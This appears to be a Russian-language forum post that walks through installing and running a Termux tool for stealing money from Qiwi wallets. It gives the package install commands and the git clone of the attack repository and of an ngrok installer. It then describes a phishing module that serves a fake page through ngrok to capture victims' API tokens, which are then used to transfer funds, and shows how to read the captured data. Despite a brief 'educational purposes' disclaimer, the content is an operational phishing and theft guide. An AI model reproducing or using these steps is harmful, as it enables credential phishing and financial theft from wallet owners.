Оффлайн
- 20.06.2022
- 26 987
- 230
- 36
- Награды
- 10
- Пол
- Муж.
- Автор темы
- Администратор
- Модератор
- Команда форума
- #1
В этой статье мы затронем тему безопасности Qiwi-кошельков, а именно, как злоумышленник может нагло стырить деньги с вашего счёта.
Но всё это исключительно в целях предостеречь вас от взлома, а не научить взламывать чужие аккаунты.
ДИСКЛЕЙМЕР:
Автор статьи никого не призывает к правонарушениям и отказывается нести ответственность за ваши действия. Вся информация предоставлена исключительно в ознакомительных целях. Спасибо!
Установка:
Начнём с установки. Её можно произвести даже в Termux.Сначала ставим необходимые для работы пакеты:
Код:
apt update
apt install git -y
apt install python -y
apt install php -y
apt install libgnutls -y
pip install colorama
pip install SimpleQIWIДалее качаем репозиторий:
Код:
git clone https://github.com/TermuxGuide/qiwiУстановка ngrok (для фишинга):
Код:
git clone https://github.com/tchelospy/termux-ngrok
cd termux-ngrok
bash termux-ngrok.sh
cd /homeЗапуск:
Переходим в директорию и запускаем:
Код:
cd qiwi
python qiwi.py
Использование:
В программе имеется 3 пункта для атаки:Первый пункт позволяет запустить веб-версию управления счётом через Qiwi API.
Qiwi API - Это специальный токен, который можно раздобыть в настройках своего Qiwi-кошелька.
Вводим необходимые данные для перевода в соответствующие строки и наблюдаем за успешным переводом:
Второй пункт отличается лишь способом управления:
Третий пункт - фишинг.
С помощью него можно создать фейковую страницу, чтобы узнать токен жертвы для использования первых двух пунктов.
Запускаем фишинг, а в другом терминале ngrok:
Переходим по получившейся ссылке в ngrok и видим такую шнягу:
(Если у вас не отображается ссылка на ngrok - попробуйте включить точку доступа и запустить заново)
Когда жертва введёт свои данные, они отобразятся в терминале.
Либо запускаем новую сессию и смотрим файл, в который сохраняются данные:
Код:
cd
cd qiwi_api
cd fish
cat counter.txt
Последние темы в этом разделе:
- Как восстановить свой телеграм аккаунт в 2025 году
- Автоматизация Без Границ: Инструменты для Связывания Приложений и Оптимизации Рутины
- Построение "Второго Мозга": Инструменты для Персонального Управления Знаниями (PKM)
- 10 Инструментов для Визуального Сторителлинга Данных
- LLM Без Кода: Инструменты для Быстрого Создания Приложений
- 5 Продвинутых Инструментов для Нового Уровня Работы с Данными в LLM-системах
- 5 инструментов для улучшения работы с данными и LLM-системами
- ✍️ Подборка нейроинструментов для креативщиков 2025
- ✍️ Подборка полезных нейросетей для создания контента и работы:
- Бесплатно получаем «Chat GPT Plus»
